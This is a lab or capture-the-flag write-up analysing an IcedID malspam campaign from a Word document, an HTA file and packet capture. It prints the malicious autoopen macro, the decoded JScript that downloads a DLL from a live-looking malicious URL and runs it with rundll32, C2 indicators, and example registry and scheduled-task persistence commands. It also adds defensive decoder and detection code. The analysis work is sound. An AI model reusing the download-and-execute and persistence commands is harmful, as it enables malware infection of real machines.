IcedID malware family
Challenge Description
Solution and Analysis
Extract the files from the password protected archive to begin the analysis.
Question 1: What is the sha256 hash for the malspam attachment?
To get this, run the following command in a terminal in the directory where the extracted files are located:
sha256sum ./*
For the first answer you need to submit the SHA256 hash of the .doc file.
Question 2: What is the child process command line when the user enabled the Macro?
We can use oletools, which detects whether the document contains a macro and dumps its VBA source. First install the tool:
pip3 install -U oletools
Then run olevba against the document:
olevba 'docs 06.02.2021.doc'
olevba 0.60.2 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: docs 06.02.2021.doc
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO leftSize.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/leftSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
initVba
Shell "explorer collectionBoxConst.hta", vbNormalFocus
End Sub
-------------------------------------------------------------------------------
VBA MACRO arrayBBorder.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/arrayBBorder'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub initVba()
Open "collectionBoxConst.hta" & buttTemplateHeader For Output As #1
Print #1, ActiveDocument.Range.Text
Close #1
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|Open |May open a file |
|Suspicious|Output |May write to a file (if combined with Open) |
|Suspicious|Print # |May write to a file (if combined with Open) |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbNormalFocus |May run an executable file or a system |
| | |command |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |collectionBoxConst.h|Executable file name |
| |ta | |
+----------+--------------------+---------------------------------------------+
Based on the olevba output, the answer is:
explorer collectionBoxConst.hta
Question 3: What is the HTML Application file's sha256 hash from previous question?
This can be found in the sha256sum output from question 1 (the line for the .hta file).
Question 4: Based on the previous question, what is the DLL run method?
Open the .hta file in Notepad or another text editor and look at its first line.
The line holds two base64-encoded scripts separated by the marker aGVsbG8. The first decodes to the download stage shown in the combined code below; the second is
fXspdHhlTnhlZG5JeGVkbmkoaGN0YWN9Oyl0Y2VqYk9Wb3BlcihlbGlmZXRlbGVkLnRjdXJ0U0xzZXR5YjsiYXRoLnRzbm9DeG9Cbm9pdGNlbGxvY1xcIiArIHlyb3RjZXJpRHRuZXJydUMudHNub0NlY25lcmVmZVJ0c3VydCA9IHRjZWpiT1ZvcGVye3lydDspInRpbkluaWd1bFAsZ3BqLnRzbm9DeG9Cbm9pdGNlbGxvY1xcY2lsYnVwXFxzcmVzdVxcOmMgMjNsbGRudXIiKG51ci50c25vQ2VjbmVyZWZlUnRzdXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gdGN1cnRTTHNldHliIHJhdjspImxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2VuID0gdHNub0NlY25lcmVmZVJ0c3VydCByYXY
In the raw line this second string has the marker aGVsbG8 in front of it; remove it to get a proper base64 string. Then decode it from base64 and reverse the result (both steps can be done in CyberChef), which gives the following.
The combined code is
var dateIntegerR = new ActiveXObject("msxml2.xmlhttp");dateIntegerR.open("GET", "http://coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC", false);dateIntegerR.send();if(dateIntegerR.status == 200){try{var varLst = new ActiveXObject("adodb.stream");varLst.open;varLst.type = 1;varLst.write(dateIntegerR.responsebody);varLst.savetofile("c:\\users\\public\\collectionBoxConst.jpg", 2);varLst.close;}catch(e){}}
var trustReferenceConst = new ActiveXObject("wscript.shell");var bytesLStruct = new ActiveXObject("scripting.filesystemobject");trustReferenceConst.run("rundll32 c:\\users\\public\\collectionBoxConst.jpg,PluginInit");try{repoVObject = trustReferenceConst.CurrentDirectory + "\\collectionBoxConst.hta";bytesLStruct.deletefile(repoVObject);}catch(indexIndexNext){}
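The decode-then-reverse step described above, as an added example that is not part of the original writeup: a small Python decoder for the HTA's first-line layout (HTML residue, base64 chunks separated by the aGVsbG8 marker, a trailing msscriptcontrol.scriptcontrol). The sample line is constructed here with two harmless placeholder scripts; the "reverse when 'var ' only appears backwards" rule is an assumption made for this example, and the decoder also restores the base64 padding that the raw chunk on the page lacks.

```python
import base64
import re

# The HTA on the page separates its base64 chunks with aGVsbG8 (base64 of "hello").
MARKER = "aGVsbG8"

def pad_b64(chunk: str) -> str:
    """Restore the '=' padding the HTA line drops, so b64decode accepts it."""
    return chunk + "=" * (-len(chunk) % 4)

def orient(text: str) -> str:
    """Heuristic (assumption for this example): the author stored scripts backwards,
    so if 'var ' only appears in the reversed text, the reversed text is the script."""
    return text[::-1] if text[::-1].count("var ") > text.count("var ") else text

def extract_chunks(line: str) -> list:
    """Split on the marker and keep the longest base64-looking run in each part,
    which drops residue such as id='...'> and msscriptcontrol.scriptcontrol."""
    chunks = []
    for part in line.split(MARKER):
        runs = re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", part)
        if runs:
            chunks.append(max(runs, key=len))
    return chunks

def decode_hta_line(line: str) -> list:
    """Return every embedded script in readable (forward) order."""
    return [orient(base64.b64decode(pad_b64(c)).decode("utf-8", "replace"))
            for c in extract_chunks(line)]

def build_sample_line() -> str:
    """Constructed sample in the page's layout: HTML residue, a forward base64 script,
    the marker, a reversed and unpadded base64 script, the marker, then the tail."""
    enc = lambda s: base64.b64encode(s.encode()).decode()
    one = 'var first = "stage one (downloader)";'
    two = 'var second = "stage two (runner)";'
    return ("id='copyCurrencyMemory'>" + enc(one) + MARKER
            + enc(two[::-1]).rstrip("=") + MARKER + "msscriptcontrol.scriptcontrol")

if __name__ == "__main__":
    for script in decode_hta_line(build_sample_line()):
        print(script)
```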
Summary of the Full Attack Chain
Stage 1 (Entry): The user is tricked into opening a Word document and enabling macros.
Stage 2 (Dropper): The VBA macro runs, which launches collectionBoxConst.hta.
Stage 3 (Downloader): The first part of the HTA's script downloads the malicious DLL from a server and saves it as c:\users\public\collectionBoxConst.jpg to evade detection.
Stage 4 (Execution): The second part of the HTA's script (the code you just found) uses wscript.shell to execute the downloaded DLL via rundll32.exe, calling the PluginInit function.
Stage 5 (Cleanup): The HTA script then deletes itself to remove the initial evidence of the dropper.
Answer to question 4: "C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit
Question 5: What is the image file dll installer sha256 hash from previous question?
This question is referring to the .dll file with the .jpg file extension which was downloaded.
The hash is already in the sha256sum output from question 1 (the line for the .jpg file).
Question 6: What are the IP address and its domain name hosted installer DLL?
We already know the domain coursemcclurez.com from the decoded script. Open the PCAP file in Wireshark and apply the display filter dns to list the DNS queries and responses.
Right-click the second entry and choose Copy > Summary as Text; the copied line contains both the domain name and the IP address it resolved to, which is the answer to this question.
Question 7: What is the full URL for the DLL installer?
This is the URL from the decoded JavaScript above:
http://coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC
Question 8: What are the two IP addresses identified as C2 servers?
This can again be found in the DNS results in Wireshark.
Most of the domains resolve to 185[.]33[.]85[.]35, and two further addresses appear: 194[.]5[.]249[.]46 and 172[.]67[.]169[.]49. The first two are the correct answer.
Question 9: What are the four C2 domains identified in the PCAP file?
We already know the C2 IP addresses, so we only need the domains whose queries resolved to those addresses. They are fimlubindu.top, kilodaser4.fit, arhannexa5.top and extrimefigim.top.
Submit them in alphabetical order to get the correct answer.
Question 10: After the DLL installer being executed, what are the two domains that were being contacted by the installer DLL?
Apply the dns display filter in Wireshark again and sort the packets by time.
coursemcclurez.com is contacted first; after that, aws.amazon.com and supplementik.top are queried. We can safely assume that after the DLL installer was downloaded from the first domain, it contacted these two domains.
Question 11: The malware generated traffic to an IP address over port 8080 with two SYN requests, what is the IP address?
Enter the display filter tcp.port == 8080; the first IP address that receives two SYN packets is the answer.
Question 12: The license.dat file was used to create persistence on the user's machine, what is the dll run method for the persistence?
To get this, open 2021-06-02-scheduledtasks.txt; around line 44 you can see the exact command that was used to create persistence.
C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat
The full command being executed is
rundll32.exe "C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"
- Executor: rundll32.exe, a legitimate Windows process used to run code from a DLL. This is a "Living Off the Land" (LOLBAS) technique.
- Malicious DLL: Tetoomdu64.dll, the file containing the malicious code.
- Function & Argument: ,update /i:"ComicFantasy\license.dat" tells rundll32.exe to run the exported function named update inside the DLL. The function is passed ComicFantasy\license.dat as an argument, likely a configuration file.
2. How the Command is Made Persistent
The command above is placed in a system location that Windows automatically runs.
- Method A: Registry Run Key (Most Common)
  - The command is added as a value to a registry key that is executed on user logon.
  - Key Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  - Example Command to Create: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "UpdateTask" /t REG_SZ /d "rundll32.exe C:\...\Tetoomdu64.dll,update ..."
- Method B: Scheduled Task
  - A new task is created to run the command on a specific trigger (e.g., user logon).
  - Example Command to Create: schtasks /create /sc ONLOGON /tn "LicenseChecker" /tr "rundll32.exe C:\...\Tetoomdu64.dll,update ..."
3. Summary of Roles
| Component | Role | Example |
|---|---|---|
| Persistence | The "Launcher" | Registry Run Key or Scheduled Task |
| Executor | The "Runner" | rundll32.exe |
| Payload | The "Malware" | The update function in Tetoomdu64.dll |
| Configuration | The "Instructions" | The contents of license.dat |
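The rundll32 "DLL run method" shows up twice in this writeup (the .jpg DLL from the HTA in question 4 and the scheduled-task entry here). As an added example that is not part of the original writeup, the Python below parses rundll32 command lines into executor, DLL, export and arguments and attaches simple triage reasons a defender would check: a DLL whose extension is not .dll, a DLL under a user-writable directory, and a config file handed over with /i:. The sample lines are constructed here in the shape of the page's two commands plus one benign control; the USER_WRITABLE list and the reason names are choices made for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample command lines in the shape of the two rundll32 invocations the
# writeup recovered (the HTA's .jpg DLL and the scheduled-task entry), plus a benign
# control line so the rule has something it should not flag.
SAMPLE_LINES = [
    r'"C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit',
    r'rundll32.exe "C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"',
    r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL',
]

RUNDLL_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s+'  # executor, quoted or bare
    r'"?(?P<dll>[^",]+?)"?\s*,\s*'                           # DLL path, optionally quoted
    r'(?P<export>\w+)(?P<args>.*)$',                          # export name, then the rest
    re.IGNORECASE)

# Directories a standard user can write to (assumption for this example); a DLL
# loaded from one of them deserves a second look.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

@dataclass
class RunDllCall:
    dll: str
    export: str
    args: str
    reasons: list = field(default_factory=list)

def parse_rundll32(cmdline: str):
    """Split a rundll32 command line into DLL, export and arguments and attach the
    triage reasons that apply; returns None for lines that are not rundll32 calls."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    call = RunDllCall(m["dll"], m["export"], m["args"].strip())
    low = call.dll.lower()
    if not low.endswith(".dll"):
        call.reasons.append("dll-extension-mismatch")   # a .jpg that rundll32 still loads
    if any(d in low for d in USER_WRITABLE):
        call.reasons.append("dll-in-user-writable-path")
    if "/i:" in call.args.lower():
        call.reasons.append("config-file-argument")     # e.g. license.dat passed via /i:
    return call

def triage(lines):
    """Return only the calls that tripped at least one reason."""
    calls = (parse_rundll32(line) for line in lines)
    return [c for c in calls if c and c.reasons]

if __name__ == "__main__":
    for c in triage(SAMPLE_LINES):
        print(c.export, c.dll, c.reasons)
```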
Question 13: With OSINT, what is the malware family name used in this PCAP capture?
The name is IcedID. This can be found using VirusTotal:
take any of the hashes obtained earlier and search for it there.
Question 14: Based on Palo Alto Unit 42, what is the APT Group name?
Just google the APT group name for the IcedID malware family together with "Palo Alto" and you will get the result TA551.
Question 15: What is the Mitre Attack code for the initial access in this campaign?
Go to the MITRE ATT&CK framework and search for TA551; you should land on this page: https://attack.mitre.org/groups/G0127/
The one that worked for me was T1566.001